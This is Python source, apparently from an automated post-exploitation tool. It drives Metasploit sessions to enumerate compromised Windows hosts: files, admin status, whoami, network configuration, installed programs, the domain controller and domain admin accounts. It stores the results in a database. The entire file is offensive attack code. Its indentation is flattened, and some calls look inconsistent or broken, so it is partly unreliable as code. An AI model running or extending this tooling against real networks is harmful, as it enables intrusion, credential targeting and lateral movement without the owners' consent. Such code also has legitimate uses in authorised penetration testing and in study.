def gatherFiles(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
try:
desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(_id=sessionInput).first()
if not recon:
Reconnaissance.gatherPWD(self, msfclient, sessionInput)
recon = Recon.objects(_id=sessionInput).first()
directory = Recon.objects().filter(directory__dir_name=recon.pwd)
if directory:
for r in directory:
for d in r.directory:
if not d.gathered:
d.gathered = True
for f in listofFiles:
file = self.parseFileData(f)
if not file:
pass
else:
files_mapped = dict(zip(desc_files, file))
d.files.append(files_mapped)
r.save()
else:
current_files = []
for _dict in d.files:
current_files.append(_dict['Name'])
for f in listofFiles:
file = self.parseFileData(f)
if not file:
pass
else:
#First check if the file is in the dict
if file[6] in current_files:
for found_dict in d.files:
if file[6]==found_dict['Name']:
self.checkingFileChanges(file, found_dict)
else:
pass
else:
#if not, add the new file info in the dict
files_mapped = dict(zip(desc_files, file))
d.files.append(files_mapped)
r.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print(msg)
pass
def deleteSessions():
'''
deletes all session data
'''
Session.objects().delete()
EscalationData.objects().delete()
Recon.objects().delete()
def gatherCurrentAdmin(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
try:
admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
for lines in admin.splitlines():
if not 'Access is denied.' in lines:
recon.isAdmin = True
else:
recon.isAdmin = False
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
for lines in admin.splitlines():
if not 'Access is denied.' in lines:
EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")
recon.isAdmin = True
else:
EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
recon.isAdmin = False
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
def gatherDomain(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
domain = ""
user_list = {'User': '******', 'IP': '0.0.0.0'}
domain_user = []
post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
post['SESSION'] = sessionInput
cid = msfclient.console
run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
for line in run_enum_domain.splitlines():
if '[-]' in line:
print("[-] Issue gathering domain info!")
else:
if line.find("Domain: ") != -1:
domain = line.split("Domain: ",1)[1]
elif line.find("Controller: ") != -1:
domain_user_info = line.split("Controller: ", 1)[1].split()
user_list['User'] = domain_user_info[0].upper()
user_list['IP'] = domain_user_info[2].replace(')', '')
else:
print("[-] Issue gathering domain info!")
post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
post['GROUP'] = 'domain admins'
post['SESSION'] = sessionInput
run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post)
for line in run_enum_domain_group_users.splitlines():
if domain in line:
users = line.split('\\')[1]
if 'not' in users:
pass
else:
domain_user.append(users)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(_id=sessionInput).first()
if recon is None:
recon = Recon()
recon_domain = ReconDomain()
recon_domain.domain = domain
recon_domain.domain_controller = user_list
recon_domain.domain_user = domain_user
recon.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
print(msg)
def gatherWhoAmI(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
try:
whoami_input = []
whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
whoami_input = whoami.splitlines()
recon.whoami = whoami_input[1]
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
for lines in whoami.splitlines():
if lines == '':
pass
else:
recon.whoami = lines
recon.save()
session.save()
EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print("There was an error!")
pass
def gatherInstalledPrograms(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
program_desc = ['Name', 'Version']
current_programs = []
session = Session.objects(_id=sessionInput).first()
msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
time.sleep(10)
run_post = msfclient.client.sessions.session(sessionInput).read()
listofPrograms = run_post.splitlines()
if session:
recon = Recon.objects(_id=sessionInput).first()
if recon is None:
recon = Recon()
recon._id = sessionInput
recon.session_id = sessionInput
session.recon_id.append(recon.session_id)
else:
for p in listofPrograms:
program = self.parseProgramList(p)
if not program:
pass
else:
programs_mapped = dict(zip(program_desc, program))
if not recon.gathered_programs:
recon.installedprg.append(programs_mapped)
else:
for list in recon.installedprg:
for key, value in list.items():
if key in programs_mapped:
pass
else:
recon.installedprg.append(programs_mapped)
recon.gathered_programs = True
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print(msg)
pass
def gatherPWD(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
try:
current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
if recon.pwd == current_pwd:
pass
else:
recon.pwd = current_pwd
reconfiles = ReconFiles()
reconfiles.dir_name = current_pwd
recon.directory.append(reconfiles)
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
recon.pwd = current_pwd
reconfiles = ReconFiles()
reconfiles.dir_name = current_pwd
recon.directory.append(reconfiles)
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print("There was an error!")
pass
def gatherNetwork(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
try:
session = Session.objects(_id=sessionInput).first()
ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
self.parseIPData(recon, ip)
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
self.parseIPData(recon, ip)
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass